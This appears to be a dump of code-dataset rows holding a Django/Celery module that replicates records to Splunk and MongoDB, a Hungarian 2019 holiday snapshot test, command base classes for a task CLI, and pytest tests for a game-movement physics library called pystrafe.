__credits__ = ['<NAME>', ]
log = logging.getLogger(__name__)
@shared_task(ignore_result=True, store_errors_even_if_ignored=True)
def push_splunk_objects(**kwargs):
object_ids = kwargs.get('object_ids')
tracker_id = kwargs.get('tracker_id')
content_type_id = kwargs.get('content_type_id')
model_name = kwargs.get('model_name')
replication_class_name = kwargs.get('replication_class_name')
source_type = kwargs.get('source_type', 'json')
source = kwargs.get('source', None)
host = kwargs.get('host', None)
dry_run = kwargs.get('dry_run', False)
assert object_ids is not None, "You failed to include object ids"
assert tracker_id is not None, "You failed to include tracker_id"
assert content_type_id is not None, "You failed to include content_type_id"
assert model_name is not None, "You failed to include model_name"
from data_replication.models import ReplicationTracker
tracker = ReplicationTracker.objects.get(id=tracker_id)
Replicator = tracker.get_replicator(replication_class_name=replication_class_name)
data = Replicator.add_items(object_ids)
for item in data:
if 'model' not in item.keys():
item['model'] = model_name
else:
log.warning("Model already exists?")
assert 'pk' in item.keys(), "Missing pk in model"
try:
splunk = SplunkRequest()
except ImproperlyConfiguredException as err:
log.error("Splunk Improperly configured - %s" % err)
return
splunk.post_data(content=data, source=source, sourcetype=source_type, host=host, dry_run=dry_run)
from data_replication.models import Replication
Replication.objects.filter(
content_type_id=content_type_id, tracker_id=tracker_id,
object_id__in=object_ids).update(state=1)
return "Added %d %s models objects to splunk" % (len(data), model_name)
@shared_task(ignore_result=True, store_errors_even_if_ignored=True)
def push_mongo_objects(**kwargs):
from pymongo.errors import ConnectionFailure, OperationFailure
object_ids = kwargs.get('object_ids')
tracker_id = kwargs.get('tracker_id')
content_type_id = kwargs.get('content_type_id')
model_name = kwargs.get('model_name')
replication_class_name = kwargs.get('replication_class_name')
collection_name = kwargs.get('collection_name', model_name)
assert object_ids is not None, "You failed to include object ids"
assert tracker_id is not None, "You failed to include tracker_id"
assert content_type_id is not None, "You failed to include content_type_id"
assert model_name is not None, "You failed to include model_name"
from data_replication.models import ReplicationTracker
tracker = ReplicationTracker.objects.get(id=tracker_id)
Replicator = tracker.get_replicator(replication_class_name=replication_class_name)
data = Replicator.add_items(object_ids)
for item in data:
assert 'pk' in item.keys(), "Missing pk in model"
try:
mongo = MongoRequest()
except ImproperlyConfiguredException as err:
log.error("Mongo Improperly configured - %s" % err)
return
try:
mongo.post_data(content=data, collection_name=collection_name)
except (ConnectionFailure, OperationFailure) as err:
log.error("Unable to connect to Mongo!! - %s", err)
else:
from data_replication.models import Replication
Replication.objects.filter(
content_type_id=content_type_id, tracker_id=tracker_id,
object_id__in=object_ids).update(state=1)
return "Added %d %s models objects to mongo" % (len(data), collection_name) | data_replication/tasks.py | """tasks.py: Django data_replication"""
import logging
from celery import shared_task
from .backends.base import ImproperlyConfiguredException
from .backends.mongo import MongoRequest
from .backends.splunk import SplunkRequest
__author__ = '<NAME>'
__date__ = '9/26/17 10:12'
__copyright__ = 'Copyright 2017 IC Manage. All rights reserved.'
__credits__ = ['<NAME>', ]
log = logging.getLogger(__name__)
@shared_task(ignore_result=True, store_errors_even_if_ignored=True)
def push_splunk_objects(**kwargs):
object_ids = kwargs.get('object_ids')
tracker_id = kwargs.get('tracker_id')
content_type_id = kwargs.get('content_type_id')
model_name = kwargs.get('model_name')
replication_class_name = kwargs.get('replication_class_name')
source_type = kwargs.get('source_type', 'json')
source = kwargs.get('source', None)
host = kwargs.get('host', None)
dry_run = kwargs.get('dry_run', False)
assert object_ids is not None, "You failed to include object ids"
assert tracker_id is not None, "You failed to include tracker_id"
assert content_type_id is not None, "You failed to include content_type_id"
assert model_name is not None, "You failed to include model_name"
from data_replication.models import ReplicationTracker
tracker = ReplicationTracker.objects.get(id=tracker_id)
Replicator = tracker.get_replicator(replication_class_name=replication_class_name)
data = Replicator.add_items(object_ids)
for item in data:
if 'model' not in item.keys():
item['model'] = model_name
else:
log.warning("Model already exists?")
assert 'pk' in item.keys(), "Missing pk in model"
try:
splunk = SplunkRequest()
except ImproperlyConfiguredException as err:
log.error("Splunk Improperly configured - %s" % err)
return
splunk.post_data(content=data, source=source, sourcetype=source_type, host=host, dry_run=dry_run)
from data_replication.models import Replication
Replication.objects.filter(
content_type_id=content_type_id, tracker_id=tracker_id,
object_id__in=object_ids).update(state=1)
return "Added %d %s models objects to splunk" % (len(data), model_name)
@shared_task(ignore_result=True, store_errors_even_if_ignored=True)
def push_mongo_objects(**kwargs):
from pymongo.errors import ConnectionFailure, OperationFailure
object_ids = kwargs.get('object_ids')
tracker_id = kwargs.get('tracker_id')
content_type_id = kwargs.get('content_type_id')
model_name = kwargs.get('model_name')
replication_class_name = kwargs.get('replication_class_name')
collection_name = kwargs.get('collection_name', model_name)
assert object_ids is not None, "You failed to include object ids"
assert tracker_id is not None, "You failed to include tracker_id"
assert content_type_id is not None, "You failed to include content_type_id"
assert model_name is not None, "You failed to include model_name"
from data_replication.models import ReplicationTracker
tracker = ReplicationTracker.objects.get(id=tracker_id)
Replicator = tracker.get_replicator(replication_class_name=replication_class_name)
data = Replicator.add_items(object_ids)
for item in data:
assert 'pk' in item.keys(), "Missing pk in model"
try:
mongo = MongoRequest()
except ImproperlyConfiguredException as err:
log.error("Mongo Improperly configured - %s" % err)
return
try:
mongo.post_data(content=data, collection_name=collection_name)
except (ConnectionFailure, OperationFailure) as err:
log.error("Unable to connect to Mongo!! - %s", err)
else:
from data_replication.models import Replication
Replication.objects.filter(
content_type_id=content_type_id, tracker_id=tracker_id,
object_id__in=object_ids).update(state=1)
return "Added %d %s models objects to mongo" % (len(data), collection_name) | 0.468791 | 0.224459 |
[
{
'date': '2019-01-01',
'description': 'Újév',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-03-15',
'description': 'Az 1848-as forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-04-19',
'description': 'Nagypéntek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-21',
'description': 'Húsvét',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-22',
'description': 'Húsvéthétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-05-01',
'description': 'A munka ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-06-09',
'description': 'Pünkösd',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-06-10',
'description': 'Pünkösdhétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-08-19',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-08-10 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-08-20',
'description': 'Az államalapítás ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-10-23',
'description': 'Az 1956-os forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-11-01',
'description': 'Mindenszentek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-24',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-07 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-12-25',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-26',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-27',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-14 pihenőnap',
'region': '',
'type': 'NF'
}
] | tests/snapshots/snap_test_holidata/test_holidata_produces_holidays_for_locale_and_year[hu_HU-2019] 1.py | [
{
'date': '2019-01-01',
'description': 'Újév',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-03-15',
'description': 'Az 1848-as forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-04-19',
'description': 'Nagypéntek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-21',
'description': 'Húsvét',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-04-22',
'description': 'Húsvéthétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-05-01',
'description': 'A munka ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-06-09',
'description': 'Pünkösd',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-06-10',
'description': 'Pünkösdhétfő',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRV'
},
{
'date': '2019-08-19',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-08-10 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-08-20',
'description': 'Az államalapítás ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-10-23',
'description': 'Az 1956-os forradalom ünnepe',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NF'
},
{
'date': '2019-11-01',
'description': 'Mindenszentek',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-24',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-07 pihenőnap',
'region': '',
'type': 'NF'
},
{
'date': '2019-12-25',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-26',
'description': 'Karácsony',
'locale': 'hu-HU',
'notes': '',
'region': '',
'type': 'NRF'
},
{
'date': '2019-12-27',
'description': 'Munkaszüneti Nap',
'locale': 'hu-HU',
'notes': '2019-12-14 pihenőnap',
'region': '',
'type': 'NF'
}
] | 0.352313 | 0.101456 |
import logging
class CommandBase:
'''
A base class providing functionality common to all commands.
'''
def __init__(self, context):
self._logger = logging.getLogger(__class__.__name__)
self._context = context
@property
def context(self):
'''
The command context.
'''
return self._context
def before_execute(self):
pass
def execute(self):
'''
Executes the logic of this command.
'''
raise Exception('Execute not implemented in {}'.format(__class__.__name__))
class FilterCommandBase(CommandBase):
def __init__(self, context, command_filter=None):
super().__init__(context)
self._filter = command_filter
@property
def filter(self):
return self._filter
@filter.setter
def filter(self, value):
self._filter = value
def execute(self):
'''
Executes the logic of this command.
'''
filtered_tasks = self.get_filtered_tasks()
self.execute_tasks(filtered_tasks)
self._logger.debug('Executed {} command on {} tasks'.format(self.__class__.__name__, len(filtered_tasks)))
def execute_tasks(self, tasks):
'''
Executes the logic of this command against the filtered tasks.
'''
raise Exception('Execute(tasks) not implemented in {}'.format(__class__.__name__))
def get_filtered_tasks(self):
items = self.context.storage.read_all()
filtered_items = self.filter.filter_items(items)
self._logger.debug('Filtered {} items to {}'.format(len(items), len(filtered_items)))
return filtered_items
class CommandParserBase:
def __init__(self, command_name):
self._command_name = command_name
super().__init__()
@property
def command_name(self):
return self._command_name
def parse(self, context, args):
raise Exception('parse not implemented in {}'.format(__class__.__name__))
def print_help(self, console):
console.print(self.get_usage())
def get_confirm_filter(self, context):
return None
def get_usage(self):
return 'tasks {}'.format(self._command_name)
class FilterCommandParserBase(CommandParserBase):
def get_usage(self):
return 'tasks [filter] {}'.format(self.command_name) | tasks/commands/commandbase.py | import logging
class CommandBase:
'''
A base class providing functionality common to all commands.
'''
def __init__(self, context):
self._logger = logging.getLogger(__class__.__name__)
self._context = context
@property
def context(self):
'''
The command context.
'''
return self._context
def before_execute(self):
pass
def execute(self):
'''
Executes the logic of this command.
'''
raise Exception('Execute not implemented in {}'.format(__class__.__name__))
class FilterCommandBase(CommandBase):
def __init__(self, context, command_filter=None):
super().__init__(context)
self._filter = command_filter
@property
def filter(self):
return self._filter
@filter.setter
def filter(self, value):
self._filter = value
def execute(self):
'''
Executes the logic of this command.
'''
filtered_tasks = self.get_filtered_tasks()
self.execute_tasks(filtered_tasks)
self._logger.debug('Executed {} command on {} tasks'.format(self.__class__.__name__, len(filtered_tasks)))
def execute_tasks(self, tasks):
'''
Executes the logic of this command against the filtered tasks.
'''
raise Exception('Execute(tasks) not implemented in {}'.format(__class__.__name__))
def get_filtered_tasks(self):
items = self.context.storage.read_all()
filtered_items = self.filter.filter_items(items)
self._logger.debug('Filtered {} items to {}'.format(len(items), len(filtered_items)))
return filtered_items
class CommandParserBase:
def __init__(self, command_name):
self._command_name = command_name
super().__init__()
@property
def command_name(self):
return self._command_name
def parse(self, context, args):
raise Exception('parse not implemented in {}'.format(__class__.__name__))
def print_help(self, console):
console.print(self.get_usage())
def get_confirm_filter(self, context):
return None
def get_usage(self):
return 'tasks {}'.format(self._command_name)
class FilterCommandParserBase(CommandParserBase):
def get_usage(self):
return 'tasks [filter] {}'.format(self.command_name) | 0.742515 | 0.121764 |
import math
import itertools
import numpy as np
from pytest import raises, approx
from pystrafe import motion
def test_strafe_K():
    """Spot-check strafe_K against known values, including zero arguments.

    All four parameters zero must raise ZeroDivisionError; a zero fourth
    argument or zero third argument yields K == 0.
    """
    with raises(ZeroDivisionError):
        motion.strafe_K(0, 0, 0, 0)
    assert motion.strafe_K(30, 0.001, 320, 0) == 0.0
    assert motion.strafe_K(30, 0.01, 320, 10) == approx(90000)
    assert motion.strafe_K(30, 0.001, 320, 10) == approx(181760)
    assert motion.strafe_K(320, 0.001, 320, 10) == approx(2037760)
    assert motion.strafe_K(320, 0.001, 320, 2000) == approx(102400000)
    assert motion.strafe_K(30, 0.001, 10, 10) == approx(1990)
    assert motion.strafe_K(30, 0.001, 0, 10) == 0
def test_strafe_K_neg_params():
    """strafe_K must reject any negative parameter with ValueError."""
    bad_args = [
        (-10, 10, 10, 10),
        (10, -10, 10, 10),
        (10, 10, -10, 10),
        (10, -10, 10, -10),
    ]
    for args in bad_args:
        with raises(ValueError):
            motion.strafe_K(*args)
def test_strafe_speedxf():
    """Check final strafing speed for several (t, v0, K) combinations.

    Negative K raises ValueError; K == 0 or t == 0 leaves the initial
    speed unchanged.
    """
    with raises(ValueError):
        motion.strafe_speedxf(4, 450, -10)
    assert motion.strafe_speedxf(4, 450, 0) == 450
    assert motion.strafe_speedxf(0, 0, 0) == 0
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert motion.strafe_speedxf(4, 450, K) == approx(964.12654771)
    assert motion.strafe_speedxf(0, 987, K) == 987
    K = motion.strafe_K(30, 0.001, 320, 100)
    assert motion.strafe_speedxf(4.2, 0, K) == approx(1944.222209522)
    K = motion.strafe_K(320, 0.01, 320, 10)
    assert motion.strafe_speedxf(2, 100, K) == approx(1975.145564256)
def test_strafe_speedxf_neg_time():
    """Negative time with zero speed raises; with a suitable positive speed
    it runs the motion backwards to the earlier speed of 400."""
    K = motion.strafe_K(320, 0.01, 320, 10)
    with raises(ValueError):
        motion.strafe_speedxf(-1, 0, K)
    assert motion.strafe_speedxf(-1, 1451.068571777, K) == approx(400)
def test_strafe_distance():
    """Check strafing distance for several (t, v0, K) inputs.

    Negative K raises ValueError; zero time gives zero distance; the sign
    of the initial speed does not make the distance negative.
    """
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.strafe_distance(1, 100, -K)
    assert motion.strafe_distance(0, 456, K) == 0
    assert motion.strafe_distance(0, 1e5, 1e8) == 0
    assert motion.strafe_distance(1, 100, K) == approx(304.32984903732694)
    K = motion.strafe_K(30, 0.01, 320, 10)
    assert motion.strafe_distance(2.5, 1, K) == approx(790.5746781033104)
    assert motion.strafe_distance(1, -100, K) == approx(226.83538223469472)
    assert motion.strafe_distance(1, 953.93920141694559, K) == approx(977.15056822651479)
def test_strafe_distance_neg_time():
    """Negative time raises for v0=100 but yields a positive distance for
    v0=1000, matching the forward case in test_strafe_distance."""
    K = motion.strafe_K(30, 0.01, 320, 10)
    with raises(ValueError):
        motion.strafe_distance(-1, 100, K)
    assert motion.strafe_distance(-1, 1000, K) == approx(977.15056822651479)
def test_strafe_distance_zero_K():
    """As K approaches zero the distance degenerates to |v0| * t."""
    assert motion.strafe_distance(1, 100, 0) == 100
    assert motion.strafe_distance(1, -100, 0) == 100
    assert motion.strafe_distance(1, 100, 1e-5) == approx(100.00000086923438)
    assert motion.strafe_distance(1, 100, 1) == approx(100.00249995834504)
def test_strafe_time():
    """Check time-to-cover-distance for several (x, v0, K) inputs.

    Negative K raises ValueError; zero distance takes zero time; an
    unreachable distance with no speed and no K takes infinite time.
    The result is symmetric in the signs of x and v0.
    """
    assert motion.strafe_time(400, 400, 1e-5) == approx(0.9999901521950959)
    assert motion.strafe_time(400, 400, 0) == approx(1)
    assert motion.strafe_time(0, 400, 0) == approx(0)
    assert motion.strafe_time(1, 0, 0) == math.inf
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.strafe_time(100, 320, -K)
    assert motion.strafe_time(100000, 320, K) == approx(49.314635892504114)
    assert motion.strafe_time(100, 320, K) == approx(0.28012970263654435)
    assert motion.strafe_time(0, 320, K) == approx(0)
    assert motion.strafe_time(-100, 320, K) == approx(0.28012970263654435)
    assert motion.strafe_time(-100, -320, K) == approx(0.28012970263654435)
    K = motion.strafe_K(30, 0.001, 320, 100)
    assert motion.strafe_time(1000, 320, K) == approx(1.2653051142112355)
    assert motion.strafe_time(0, 320, K) == approx(0)
def test_strafe_time_extremes():
    """strafe_time must never go negative over a wide grid of tiny
    distances and huge speeds (numerical-stability sweep)."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    xs = [0, 1e-15, 1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2]
    vs = [0, 1, 1e1, 1e2, 1e3, 1e4, 1e5, 1e6, 1e7, 1e8, 1e9, 1e10, 1e15]
    for x, v in itertools.product(xs, vs):
        assert motion.strafe_time(x, v, K) >= 0
def test_gravity_speediz_distance_time_zero_t():
    """With zero time, a nonzero displacement needs +/-inf initial vertical
    speed (sign follows the displacement); zero displacement raises."""
    assert motion.gravity_speediz_distance_time(0, 1, 800) == math.inf
    assert motion.gravity_speediz_distance_time(0, -1, 800) == -math.inf
    with raises(ValueError):
        motion.gravity_speediz_distance_time(0, 0, 800)
    with raises(ValueError):
        motion.gravity_speediz_distance_time(0, 0, 0)
    assert motion.gravity_speediz_distance_time(0, 1, 0) == math.inf
    assert motion.gravity_speediz_distance_time(0, -1, 0) == -math.inf
def test_gravity_time_speediz_z():
    """Check the (t_early, t_late) root pair returned for given initial
    vertical speed, displacement, and gravity.

    Zero gravity with nonzero speed gives equal roots; zero speed with an
    unreachable positive displacement raises ValueError; flipping the signs
    of gravity and displacement mirrors the roots.
    """
    assert motion.gravity_time_speediz_z(10, 10, 0) == (1, 1)
    with raises(ZeroDivisionError):
        motion.gravity_time_speediz_z(0, 10, 0)
    assert motion.gravity_time_speediz_z(0, 0, 800) == (0, 0)
    with raises(ValueError):
        motion.gravity_time_speediz_z(0, 10, 800)
    ret = motion.gravity_time_speediz_z(0, 10, -800)
    assert ret[0] == approx(0.15811388300841897)
    assert ret[1] == approx(-0.15811388300841897)
    ret = motion.gravity_time_speediz_z(0, -10, 800)
    assert ret[0] == approx(-0.15811388300841897)
    assert ret[1] == approx(0.15811388300841897)
    ret = motion.gravity_time_speediz_z(-100, 6.25, 800)
    assert ret[0] == approx(-0.125)
    assert ret[0] == approx(ret[1])
    ret = motion.gravity_time_speediz_z(268, 20, 800)
    assert ret[0] == approx(0.085550606334671569)
    assert ret[1] == approx(0.58444939366532844)
    ret = motion.gravity_time_speediz_z(268, -20, 560)
    assert ret[0] == approx(-0.069570144084276309)
    assert ret[1] == approx(1.0267130012271333)
def test_gravity_time_speediz_z_curve_shape():
    """Property sweep: for distinct roots, vertical velocity v - g*t must
    still be positive (ascending) at the early root and negative
    (descending) at the late root."""
    vs = range(-1000, 1001, 50)
    zs = range(-10000, 10000, 100)
    for v, z in itertools.product(vs, zs):
        try:
            t = motion.gravity_time_speediz_z(v, z, 800)
        except (ZeroDivisionError, ValueError):
            # unreachable displacement or degenerate input — not under test here
            continue
        if math.isclose(t[0], t[1]):
            continue
        assert v - 800 * t[0] > 0
        assert v - 800 * t[1] < 0
def test_strafe_solve_speedxi():
    """A negative K must be rejected with ValueError."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.strafe_solve_speedxi(10, -K, 400, -200, 800)
def test_strafe_solve_speedxi_neg_z():
    """Required initial horizontal speed when the target is below the start
    (negative z); generous fall time or enough initial speed drives the
    requirement to zero."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert motion.strafe_solve_speedxi(0, K, 100, -18, 800) == approx(450.6474498822009)
    assert motion.strafe_solve_speedxi(0, K, 100, -100, 800) == approx(0)
    assert motion.strafe_solve_speedxi(163.23541222592047, K, 100, -18, 800) == approx(0)
    assert motion.strafe_solve_speedxi(200, K, 100, -18, 800) == approx(0)
    assert motion.strafe_solve_speedxi(0, K, 100, -1e-3, 800) == approx(63245.55095141193)
    assert motion.strafe_solve_speedxi(-10000, K, 100, -100, 800) == approx(10003.952996977921)
    assert motion.strafe_solve_speedxi(-100, K, 200, -200, 800) == approx(248.98914739139963)
def test_strafe_solve_speedxi_pos_z():
    """Target above the start: reachable height needs no extra speed, while
    an unreachable height (700 at 800 gravity) raises ValueError."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert motion.strafe_solve_speedxi(1000, K, 100, 400, 800) == approx(0)
    with raises(ValueError):
        motion.strafe_solve_speedxi(1000, K, 100, 700, 800)
    with raises(ValueError):
        motion.strafe_solve_speedxi(0, K, 100, 700, 800)
def test_strafe_solve_speedxi_zero_z():
    """Zero height change: any nonzero horizontal distance demands infinite
    initial speed; zero distance demands none."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert motion.strafe_solve_speedxi(1000, K, 1, 0, 800) == math.inf
    assert motion.strafe_solve_speedxi(0, K, 0, 0, 800) == approx(0)
    assert motion.strafe_solve_speedxi(0, K, 100, 0, 800) == math.inf
    assert motion.strafe_solve_speedxi(0, K, 1e-5, 0, 800) == math.inf
def test_strafe_solve_speedxi_zero_x():
    """Zero horizontal distance: reaching a height requires sufficient
    initial vertical speed (viz=40 reaches z=1 but not z=2; viz=0 reaches
    neither), otherwise ValueError."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.strafe_solve_speedxi(0, K, 0, 1, 800)
    with raises(ValueError):
        motion.strafe_solve_speedxi(40, K, 0, 2, 800)
    assert motion.strafe_solve_speedxi(40, K, 0, 1, 800) == approx(0)
def test_strafe_solve_speedxi_impossible():
    """Infeasible combinations: negative initial vertical speed with a
    target above yields NaN, while viz=0 against the same height raises."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    assert math.isnan(motion.strafe_solve_speedxi(-100, K, 0, 2, 800))
    assert math.isnan(motion.strafe_solve_speedxi(-100, K, 10, 2, 800))
    with raises(ValueError):
        motion.strafe_solve_speedxi(0, K, 10, 2, 800)
def test_strafe_solve_speedxi_curve_shape():
    """Property sweep: with the solved initial horizontal speed, the strafe
    time to cover x must not exceed the early gravity root for reaching z."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    xs = range(1, 10000, 500)
    zs = range(1, 601, 100)
    for x, z in itertools.product(xs, zs):
        vix = motion.strafe_solve_speedxi(1000, K, x, z, 800)
        tx = motion.strafe_time(x, vix, K)
        tz = motion.gravity_time_speediz_z(1000, z, 800)
        # allow equality within floating-point tolerance
        if not math.isclose(tx, tz[0], abs_tol=1e-6):
            assert tx <= tz[0]
def test_solve_boost_min_dmg():
    """Minimal boost from rest to reach (400, 400): check the solved
    components, reject negative K, and verify the strafe time matches the
    late gravity root with the player descending on arrival."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    with raises(ValueError):
        motion.solve_boost_min_dmg([0, 0], -K, 400, 400, 800)
    dv = motion.solve_boost_min_dmg([0, 0], K, 400, 400, 800)
    assert dv[0] == approx(79.399032802535118, 1e-4)
    assert dv[1] == approx(816.5301806366407, 1e-4)
    t = motion.gravity_time_speediz_z(dv[1], 400, 800)
    assert t[1] == approx(motion.strafe_time(400, dv[0], K))
    # vertical velocity at the late root must be non-positive (falling)
    assert dv[1] - 800 * t[1] <= 0
def test_solve_boost_min_dmg_neg_z():
    """Target below the start: solved boosts for two K values, and a
    trivial case (no distance, falling target, at rest) needing no boost."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    dv = motion.solve_boost_min_dmg([400, 268], K, 1500, -200, 800)
    assert dv[0] == approx(298.46589871993854, 1e-4)
    assert dv[1] == approx(366.81197893286605, 1e-4)
    K = motion.strafe_K(30, 0.001, 320, 100)
    dv = motion.solve_boost_min_dmg([400, 268], K, 1500, -200, 800)
    assert dv[0] == approx(77.238561539572189, 1e-4)
    assert dv[1] == approx(241.47957829048562, 1e-4)
    dv = motion.solve_boost_min_dmg([0, 0], K, 0, -200, 800)
    assert dv[0] == approx(0)
    assert dv[1] == approx(0)
def test_solve_boost_min_dmg_neg_viz():
    """Initially falling (viz = -600): the solved boost must make the strafe
    time coincide with the late gravity root of the boosted vertical speed."""
    K = motion.strafe_K(30, 0.001, 320, 100)
    dv = motion.solve_boost_min_dmg([0, -600], K, 300, -200, 800)
    assert dv[0] == approx(51.986602324707007)
    assert dv[1] == approx(511.7601499627252)
    tx = motion.strafe_time(300, dv[0], K)
    tz = motion.gravity_time_speediz_z(-600 + dv[1], -200, 800)
    assert tx == approx(tz[1])
    K = motion.strafe_K(30, 0.001, 320, 10)
    dv = motion.solve_boost_min_dmg([0, -600], K, 1000, 500, 800)
    assert dv[0] == approx(520.92144757654194)
    assert dv[1] == approx(1545.1246586237653)
    tx = motion.strafe_time(1000, dv[0], K)
    tz = motion.gravity_time_speediz_z(-600 + dv[1], 500, 800)
    assert tx == approx(tz[1])
def test_solve_boost_min_dmg_range():
    """Property sweep over targets (d, d): solved boosts stay bounded and
    non-negative, land descending, bracket the strafe time between the
    gravity roots, and re-solving from the boosted state needs no further
    boost (idempotence)."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    for d in itertools.chain(range(-10000, 10001, 100), np.arange(-100, 100, 0.5)):
        dv = motion.solve_boost_min_dmg([0, 0], K, d, d, 800)
        assert dv[0] < 1e4 and dv[1] < 1e4
        assert dv[0] >= 0 and dv[1] >= 0
        t = motion.gravity_time_speediz_z(dv[1], d, 800)
        # descending (or level) at the late root
        assert dv[1] - 800 * t[1] <= 0
        strafe_t = motion.strafe_time(d, dv[0], K)
        if not math.isclose(t[1], strafe_t):
            assert t[1] > strafe_t
        if not math.isclose(t[0], strafe_t):
            assert t[0] < strafe_t
        # already boosted: a second solve should require (almost) nothing
        dv = motion.solve_boost_min_dmg(dv, K, d, d, 800)
        assert dv[0] == approx(0, abs=1e-5)
        assert dv[1] == approx(0, abs=1e-5)
        dv = motion.solve_boost_min_dmg([0, 0], K, 400, d, 800)
        assert dv[0] < 1e4 and dv[1] < 1e4
def test_solve_boost_min_dmg_inc_v():
    """Monotonicity: raising either initial velocity component must never
    increase the magnitude of the required boost."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    prev = math.inf
    for vx in range(0, 10000, 100):
        dv = motion.solve_boost_min_dmg([vx, 0], K, 1500, -200, 800)
        mag = math.hypot(dv[0], dv[1])
        assert mag <= prev
        prev = mag
    prev = math.inf
    for vy in range(0, 10000, 100):
        dv = motion.solve_boost_min_dmg([0, vy], K, 1500, -200, 800)
        mag = math.hypot(dv[0], dv[1])
        assert mag <= prev
        prev = mag
def test_solve_boost_min_dmg_zero_pos():
    """Degenerate targets with zero horizontal distance.

    Falling/level targets need no boost; a target directly above needs a
    very large vertical boost.  The solver may emit numeric warnings for
    these degenerate inputs, so they are suppressed for the duration of
    the test only.
    """
    # np.warnings was removed in NumPy 1.24, so the original
    # np.warnings.filterwarnings(...) calls crash on modern NumPy.  Use the
    # stdlib warnings module with a context manager, which also restores
    # the filter state even when an assertion fails (the original left the
    # 'ignore' filter installed on failure).
    import warnings
    K = motion.strafe_K(30, 0.001, 320, 10)
    with warnings.catch_warnings():
        warnings.simplefilter('ignore')
        dv = motion.solve_boost_min_dmg([400, 0], K, 0, -1, 800)
        assert dv[0] == approx(0, abs=1e-5)
        assert dv[1] == approx(0, abs=1e-5)
        dv = motion.solve_boost_min_dmg([0, 0], K, 0, 1, 800)
        assert dv[1] >= 1e4
        dv = motion.solve_boost_min_dmg([200, 200], K, 0, 0, 800)
        assert dv[0] == approx(0, abs=1e-5)
        assert dv[1] == approx(0, abs=1e-5)
def test_solve_boost_min_dmg_neg_x():
    """The solution is symmetric in the sign of the horizontal distance."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    mirrored = [motion.solve_boost_min_dmg([0, 0], K, x, 500, 800)
                for x in (-400, 400)]
    assert mirrored[0] == mirrored[1]
def test_solve_boost_min_dmg_no_dv():
    """Cases where the current state already reaches the target, so no
    boost (or only a vertical-free fall) is required."""
    K = motion.strafe_K(30, 0.001, 320, 10)
    dv = motion.solve_boost_min_dmg([0, 0], K, 100, -100000, 800)
    assert dv[0] == approx(0, abs=1e-5)
    dv = motion.solve_boost_min_dmg([10000, 0], K, 1000, -10, 800)
    assert dv[0] == approx(0, abs=1e-5)
    assert dv[1] == approx(0, abs=1e-5)
    dv = motion.solve_boost_min_dmg([0, 1500], K, 500, 1000, 800)
    assert dv[0] == approx(0, abs=1e-5)
    assert dv[1] == approx(0, abs=1e-5)
import itertools
